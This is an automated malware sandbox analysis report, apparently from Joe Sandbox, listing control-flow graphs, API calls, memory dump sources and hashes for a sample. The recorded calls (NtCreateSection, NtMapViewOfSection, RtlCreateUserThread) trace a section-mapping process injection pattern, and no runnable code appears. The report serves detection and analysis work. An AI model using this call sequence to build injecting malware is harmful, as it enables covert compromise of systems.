                                                                              control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 345->346 352 4018c5 346->352 353 4018bc-4018e3 call 401193 346->353 352->353 355->345 357 4015e1-401605 NtCreateSection 355->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 361 40168d-401691 359->361 360->359 363 40162a-401646 NtMapViewOfSection 360->363 361->345 364 401697-4016b8 NtMapViewOfSection 361->364 363->359 366 401648-40165e 363->366 364->345 367 4016be-4016da NtMapViewOfSection 364->367 366->359 367->345 369 4016e0 call 4016e5 367->369
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-403038 407->409 410 403062-403065 408->410 411 403042-403061 408->411 409->408 412 403067-40306a 410->412 413 40306e 410->413 411->410 412->413 414 40306c 412->414 413->405 415 403070-403075 413->415 414->415 415->403 416 403077-40307a 415->416 416->403 417 40307c-4030eb RtlCreateUserThread NtTerminateProcess 416->417 417->403
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1921587553-0
                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 418 2dd03d8-2dd03f1 419 2dd03f3-2dd03f5 418->419 420 2dd03fc-2dd0408 CreateToolhelp32Snapshot 419->420 421 2dd03f7 419->421 422 2dd0418-2dd0425 Module32First 420->422 423 2dd040a-2dd0410 420->423 421->420 424 2dd042e-2dd0436 422->424 425 2dd0427-2dd0428 call 2dd0097 422->425 423->422 430 2dd0412-2dd0416 423->430 428 2dd042d 425->428 428->424 430->419 430->422
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DD0400
                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02DD0420
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 3833638111-0
                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction ID: 630991527fc547d62c36ee996d41be250d192eb940440a7321f2c8722511e997
                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction Fuzzy Hash: 29F09636200B156BD7203BF9A88CF6F76E8EF89726F100528E696915C0DB70EC458A61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 70 2d9003c-2d90047 71 2d90049 70->71 72 2d9004c-2d90263 call 2d90a3f call 2d90e0f call 2d90d90 VirtualAlloc 70->72 71->72 87 2d9028b-2d90292 72->87 88 2d90265-2d90289 call 2d90a69 72->88 90 2d902a1-2d902b0 87->90 92 2d902ce-2d903c2 VirtualProtect call 2d90cce call 2d90ce7 88->92 90->92 93 2d902b2-2d902cc 90->93 99 2d903d1-2d903e0 92->99 93->90 100 2d90439-2d904b8 VirtualFree 99->100 101 2d903e2-2d90437 call 2d90ce7 99->101 103 2d904be-2d904cd 100->103 104 2d905f4-2d905fe 100->104 101->99 106 2d904d3-2d904dd 103->106 107 2d9077f-2d90789 104->107 108 2d90604-2d9060d 104->108 106->104 110 2d904e3-2d90505 106->110 111 2d9078b-2d907a3 107->111 112 2d907a6-2d907b0 107->112 108->107 113 2d90613-2d90637 108->113 121 2d90517-2d90520 110->121 122 2d90507-2d90515 110->122 111->112 114 2d9086e-2d908be LoadLibraryA 112->114 115 2d907b6-2d907cb 112->115 116 2d9063e-2d90648 113->116 120 2d908c7-2d908f9 114->120 118 2d907d2-2d907d5 115->118 116->107 119 2d9064e-2d9065a 116->119 123 2d90824-2d90833 118->123 124 2d907d7-2d907e0 118->124 119->107 125 2d90660-2d9066a 119->125 126 2d908fb-2d90901 120->126 127 2d90902-2d9091d 120->127 128 2d90526-2d90547 121->128 122->128 132 2d90839-2d9083c 123->132 129 2d907e2 124->129 130 2d907e4-2d90822 124->130 131 2d9067a-2d90689 125->131 126->127 136 2d9054d-2d90550 128->136 129->123 130->118 133 2d9068f-2d906b2 131->133 134 2d90750-2d9077a 131->134 132->114 135 2d9083e-2d90847 132->135 137 2d906ef-2d906fc 133->137 138 2d906b4-2d906ed 133->138 134->116 139 2d90849 135->139 140 2d9084b-2d9086c 135->140 142 2d905e0-2d905ef 136->142 143 2d90556-2d9056b 136->143 144 2d9074b 137->144 145 2d906fe-2d90748 137->145 138->137 139->114 140->132 142->106 146 2d9056d 143->146 147 2d9056f-2d9057a 143->147 144->131 145->144 146->142 148 2d9059b-2d905bb 147->148 149 2d9057c-2d90599 147->149 154 2d905bd-2d905db 148->154 149->154 154->136
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D9024D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID: cess$kernel32.dll
                                                                              • API String ID: 4275171209-1230238691
                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction ID: 19c608a10c3f047ae6230d16906b32d707d0f14c61c47ef9a3938d3e8988d833
                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction Fuzzy Hash: 3C525874A01229DFDB64CF68D984BA8BBB1BF09315F1480D9E94DAB351DB30AE85CF14

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 372 4178e3-4178ea 373 4178f0-417900 372->373 374 417902 373->374 375 417908-41790b 373->375 374->375 375->373 376 41790d-41792e LoadLibraryA call 417290 call 417580 375->376 381 417930-417937 376->381 382 417943-417949 381->382 383 417939-41793f 381->383 384 417950-417957 382->384 385 41794b call 417280 382->385 383->382 388 417966-41796d 384->388 389 417959-417960 InterlockedDecrement 384->389 385->384 388->381 390 41796f-41797f 388->390 389->388 391 417980-417990 390->391 392 417992 391->392 393 417999-41799c 391->393 392->393 393->391 394 41799e-4179a9 393->394 395 4179b0-4179b5 394->395 396 4179b7-4179bd 395->396 397 4179bf-4179c5 395->397 396->397 398 4179c7-4179d4 396->398 397->395 397->398
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417960
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: DecrementInterlockedLibraryLoad
                                                                              • String ID: k`$}$
                                                                              • API String ID: 1728580480-956986773
                                                                              • Opcode ID: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
                                                                              • Instruction ID: 134cc60ee6fbcd4284a2d3b71c5bd9fcb84d361ebfdf38d762708a44da6be8e6
                                                                              • Opcode Fuzzy Hash: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
                                                                              • Instruction Fuzzy Hash: EE2136B0D982158BDB309B24D8817EA7730EB49321F11447FD98997281CA3C58C9CB9D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 400 417290-4173d0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041736F
                                                                              • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 004173AC
                                                                              • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 004173CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 2099061454-3916222277
                                                                              • Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                              • Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
                                                                              • Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                              • Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 431 2d90e0f-2d90e24 SetErrorMode * 2 432 2d90e2b-2d90e2c 431->432 433 2d90e26 431->433 433->432
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02D90223,?,?), ref: 02D90E19
                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02D90223,?,?), ref: 02D90E1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction ID: 89d7fe53a4739ae435d3ec7ad4b23bed7c1142db86f615a5dd78f8ce4d487e67
                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction Fuzzy Hash: D6D0123514512877DB002A94DC09BCD7B1CDF05B67F008011FB0DD9180C770994046E5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 434 4018e6-40194b call 401193 Sleep call 40141f 448 40195a-4019a5 call 401193 434->448 449 40194d-401955 call 401514 434->449 449->448
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 463 401915-401918 464 4018c6-4018c7 463->464 465 40191a-40194b call 401193 Sleep call 40141f 463->465 466 4018d7 464->466 467 4018ce-4018e3 call 401193 464->467 477 40195a-4019a5 call 401193 465->477 478 40194d-401955 call 401514 465->478 466->467 478->477
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 492 4018f1-40194b call 401193 Sleep call 40141f 502 40195a-4019a5 call 401193 492->502 503 40194d-401955 call 401514 492->503 503->502
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DD00E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction ID: 305ba912bfa7997b51666b2c582c8ad426b9d136ad82fb3b3e9f0584a38af66b
                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction Fuzzy Hash: A8112B79A00208EFDB01DF98C985E98BBF5EF08351F058094FA489B361D371EA50DF90
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                              APIs
                                                                              • LocalAlloc.KERNELBASE(00000000,02B1AF6C,004178C4), ref: 00417268
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: AllocLocal
                                                                              • String ID:
                                                                              • API String ID: 3494564517-0
                                                                              • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                              • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                                                              • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                              • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$GetProcAddress.$l
                                                                              • API String ID: 0-2784972518
                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction ID: 9eeb17fdbd48a56657b25916814786f419fdf2f5f63ab0abac8ed0b3c1dbfc28
                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction Fuzzy Hash: 89313AB6900609DFDB10CF99D880AAEBBF9FF48325F19414AE841A7310D771EA45CFA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                              • Instruction ID: e11adb9f47b2abbe56d3c95416909f0c304446f28bb2b0849516fdf2296607c6
                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                              • Instruction Fuzzy Hash: 66115A72340101AFDB54DF55DC91EE673ABEB89220B29806AED04CB715D675EC42CB60
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                              • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                              • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                              • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                              • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                              • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                              • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                              • Instruction ID: 7099863ea9e100599d30a29228cb7206aacd7d3adb79b8ef829c398448bb22d8
                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                              • Instruction Fuzzy Hash: 5401D676A106048FDF21CF24E804BAA33F9FB86217F4584B5E90AD7781E774AD41CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                              • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                              • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                              • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                              • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                              • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
